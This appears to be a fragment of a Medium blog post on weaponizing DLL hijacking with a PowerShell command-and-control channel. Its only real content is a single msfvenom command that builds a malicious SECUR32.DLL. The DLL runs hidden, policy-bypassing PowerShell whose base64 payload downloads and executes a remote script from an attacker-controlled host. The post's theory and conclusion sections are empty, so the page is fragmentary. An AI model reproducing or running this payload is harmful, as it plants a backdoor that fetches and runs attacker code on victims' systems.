Weaponizing DLL Hijacking with Custom Powershell C2

I like to start with theory first so, let’s go

The idea is simple

msfvenom -f dll -p windows/exec CMD="powershell.exe -exec bypass -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADIANgAuADEAMgA4AC8AYwBsAGkAZQBuAHQALgBwAHMAMQAnACkA" -o SECUR32.DLL

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store